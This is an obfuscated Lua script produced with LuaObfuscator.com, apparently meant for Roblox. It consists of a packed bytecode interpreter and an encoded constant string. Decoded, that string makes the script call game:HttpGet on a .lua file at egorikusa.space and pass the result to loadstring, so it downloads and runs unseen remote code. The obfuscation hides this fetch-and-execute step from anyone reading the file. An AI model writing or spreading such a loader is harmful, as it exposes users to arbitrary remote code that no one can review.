--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v102=v5(v69,v19);v19=nil;return v102;else return v69;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v70=(v31/(((1275 -(226 + 1044)) -3)^(v32-1)))%((929 -(214 + 713))^(((v33-(2 -1)) -(v32-(1 + 0))) + 1 + 0)) ;return v70-(v70%(1 -0)) ;else local v71=(1639 -(1523 + 114))^(v32-(2 -1)) ;return (((v31%(v71 + v71))>=v71) and (620 -(555 + 64))) or (931 -(857 + (322 -248))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + 85) ;local v36;local v37;while true do if (v35==(1 + (350 -(87 + 263)))) then return (v37 * (57 + 199)) + v36 ;end if (v35==(957 -((1072 -(67 + 113)) + 65))) then v36,v37=v1(v16,v18,v18 + ((3 + 1) -2) );v18=v18 + (3 -1) ;v35=(2 -1) -0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (10 -6) ;return (v41 * (30433252 -13656036)) + (v40 * (260471 -194935)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=998 -(915 + 82) ;local v45=(v20(v43,1,56 -36 ) * ((2 + 0)^(462 -(44 + 386)))) + v42 ;local v46=v20(v43,(1513 -(998 + 488)) -(2 + 4) ,1218 -(1069 + 118) );local v47=((v20(v43,(59 + 13) -40 )==(1 -0)) and  -(1 + 0)) or (1 -0) ;if (v46==(0 + (772 -(201 + 571)))) then if (v45==(791 -(368 + 423))) then return v47 * 0 ;else local v78=0 -0 ;while true do if (v78==(18 -((1148 -(116 + 1022)) + 8))) then v46=3 -2 ;v44=0;break;end end end elseif (v46==(2489 -(416 + 26))) then return ((v45==(0 -0)) and (v47 * ((4 -3)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1809 -786) ) * (v44 + (v45/(2^(490 -(145 + 293))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=3 -2 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==2) then local v72=0;while true do if (v72==(1 + 0)) then return v55;end if (v72==(574 -(507 + 67))) then for v103=1750 -(1013 + 736) ,v23() do local v104=0;local v105;while true do if (v104~=(0 + 0)) then else v105=v21();if (v20(v105,1,1)==(0 -0)) then local v114=0 -0 ;local v115;local v116;local v117;local v118;local v119;local v120;while true do if (v114~=3) then else while true do if (v115==1) then v118=nil;v119=nil;v115=869 -(550 + 317) ;end if (v115~=(2 -0)) then else v120=nil;while true do if (v116~=(1 -0)) then else local v163=0 -0 ;while true do if (v163==(285 -(134 + 151))) then local v164=1665 -(970 + 695) ;while true do if (v164~=1) then else v163=1 -0 ;break;end if (v164==0) then v119=nil;v120=nil;v164=1991 -(582 + 1408) ;end end end if (1~=v163) then else v116=6 -4 ;break;end end end if (v116~=(0 -0)) then else v117=0;v118=nil;v116=3 -2 ;end if (v116==(1826 -(1195 + 629))) then while true do if (v117==2) then local v165=0 -0 ;while true do if (v165==0) then local v173=241 -(187 + 54) ;while true do if (v173==1) then v165=781 -(162 + 618) ;break;end if (0~=v173) then else if (v20(v119,1 + 0 ,1 + 0 )~=(1 -0)) then else v120[2 -0 ]=v57[v120[1 + 1 ]];end if (v20(v119,1638 -(1373 + 263) ,2)~=(1001 -(451 + 549))) then else v120[1 + 2 ]=v57[v120[3]];end v173=1;end end end if (v165==(1 -0)) then v117=4 -1 ;break;end end end if ((1387 -(746 + 638))==v117) then if (v20(v119,2 + 1 ,4 -1 )==(342 -(218 + 123))) then v120[1585 -(1535 + 46) ]=v57[v120[4 + 0 ]];end v52[v103]=v120;break;end if (v117==(1 + 0)) then local v167=560 -(306 + 254) ;while true do if ((0 + 0)~=v167) then else local v174=0;while true do if (v174~=(0 -0)) then else v120={v22(),v22(),nil,nil};if (v118==(0 -0)) then local v179=0;local v180;local v181;while true do if (v179~=(603 -(268 + 335))) then else v180=290 -(60 + 230) ;v181=nil;v179=1;end if (v179~=1) then else while true do if (v180~=(572 -(426 + 146))) then else v181=0 + 0 ;while true do if (v181~=(1456 -(282 + 1174))) then else v120[3]=v22();v120[4]=v22();break;end end break;end end break;end end elseif (v118==(812 -(569 + 242))) then v120[8 -5 ]=v23();elseif (v118==2) then v120[1 + 2 ]=v23() -(2^(1040 -(706 + 318))) ;elseif (v118==3) then local v185=0;local v186;while true do if (v185~=0) then else v186=0;while true do if (v186~=(1251 -(721 + 530))) then else v120[1274 -(945 + 326) ]=v23() -(2^(39 -23)) ;v120[4]=v22();break;end end break;end end end v174=1 + 0 ;end if ((701 -(271 + 429))==v174) then v167=1;break;end end end if (v167~=(1 + 0)) then else v117=1502 -(1408 + 92) ;break;end end end if (v117~=(1086 -(461 + 625))) then else local v168=1288 -(993 + 295) ;local v169;local v170;while true do if (v168~=(0 + 0)) then else v169=1171 -(418 + 753) ;v170=nil;v168=1 + 0 ;end if (v168==(1 + 0)) then while true do if (v169~=(0 + 0)) then else v170=0 + 0 ;while true do if (0~=v170) then else local v182=0;while true do if (v182==(529 -(406 + 123))) then v118=v20(v105,1771 -(1749 + 20) ,1 + 2 );v119=v20(v105,1326 -(1249 + 73) ,3 + 3 );v182=1146 -(466 + 679) ;end if (v182==(2 -1)) then v170=2 -1 ;break;end end end if (v170==1) then v117=1901 -(106 + 1794) ;break;end end break;end end break;end end end end break;end end break;end if (v115==(0 + 0)) then local v162=0 + 0 ;while true do if (v162==1) then v115=1;break;end if ((0 -0)~=v162) then else v116=0;v117=nil;v162=2 -1 ;end end end end break;end if (v114~=2) then else v119=nil;v120=nil;v114=3;end if (v114~=1) then else v117=nil;v118=nil;v114=116 -(4 + 110) ;end if (v114==0) then v115=0;v116=nil;v114=585 -(57 + 527) ;end end end break;end end end for v106=1,v23() do v53[v106-(1428 -(41 + 1386)) ]=v28();end v72=1;end end end if (v51==(104 -(17 + 86))) then v56=v23();v57={};for v79=1 + 0 ,v56 do local v80=0 -0 ;local v81;local v82;local v83;local v84;while true do if (0~=v80) then else v81=0;v82=nil;v80=2 -1 ;end if (v80==(168 -(122 + 44))) then while true do if (v81~=(0 -0)) then else v82=0;v83=nil;v81=3 -2 ;end if (v81==(1 + 0)) then v84=nil;while true do if (v82~=(1 + 0)) then else if (v83==(1 -0)) then v84=v21()~=0 ;elseif (v83==2) then v84=v24();elseif (v83~=3) then else v84=v25();end v57[v79]=v84;break;end if (v82~=(65 -(30 + 35))) then else local v122=0 + 0 ;local v123;while true do if (v122==(1257 -(1043 + 214))) then v123=0 -0 ;while true do if (v123==(1213 -(323 + 889))) then v82=1;break;end if (v123==0) then v83=v21();v84=nil;v123=2 -1 ;end end break;end end end end break;end end break;end if (v80==1) then v83=nil;v84=nil;v80=2;end end end v55[583 -(361 + 219) ]=v21();v51=322 -(53 + 267) ;end if (0==v51) then local v74=0;while true do if ((1 + 1)==v74) then v51=1;break;end if (v74==(414 -(15 + 398))) then v54={};v55={v52,v53,nil,v54};v74=2;end if (v74==0) then v52={};v53={};v74=1 + 0 ;end end end end end local function v29(v58,v59,v60) local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...) local v85=v62;local v86=v63;local v87=v64;local v88=v27;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=6) then if (v98<=2) then if (v98<=0) then v95[v97[2]]();elseif (v98==1) then v95[v97[2]]=v97[3];else local v126=v97[2];v95[v126]=v95[v126](v13(v95,v126 + 1 ,v90));end elseif (v98<=4) then if (v98==3) then v95[v97[2]]();else v95[v97[2]]=v60[v97[3]];end elseif (v98>5) then local v130=v97[2];local v131=v95[v97[3]];v95[v130 + 1 ]=v131;v95[v130]=v131[v97[4]];else v95[v97[2]]=v97[3];end elseif (v98<=9) then if (v98<=7) then local v112=0;local v113;while true do if (v112==0) then v113=v97[2];v95[v113]=v95[v113](v13(v95,v113 + 1 ,v90));break;end end elseif (v98==8) then local v137=v97[2];local v138=v95[v97[3]];v95[v137 + 1 ]=v138;v95[v137]=v138[v97[4]];else do return;end end elseif (v98<=11) then if (v98==10) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==1) then v90=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==2) then for v159=v143,v90 do v146=v146 + 1 ;v95[v159]=v144[v146];end break;end if (v142==0) then v143=v97[2];v144,v145=v88(v95[v143](v13(v95,v143 + 1 ,v97[3])));v142=1;end end else local v147=v97[2];local v148,v149=v88(v95[v147](v13(v95,v147 + 1 ,v97[3])));v90=(v149 + v147) -1 ;local v150=0;for v155=v147,v90 do v150=v150 + 1 ;v95[v155]=v148[v150];end end elseif (v98==12) then v95[v97[2]]=v60[v97[3]];else do return;end end v89=v89 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F3564376135323339613033633932343933323762662O61662E6C756100083O00120C3O00013O00120C000100023O002008000100010003001201000300044O000B000100034O00025O00026O000100012O000D3O00017O00",v9(),...);
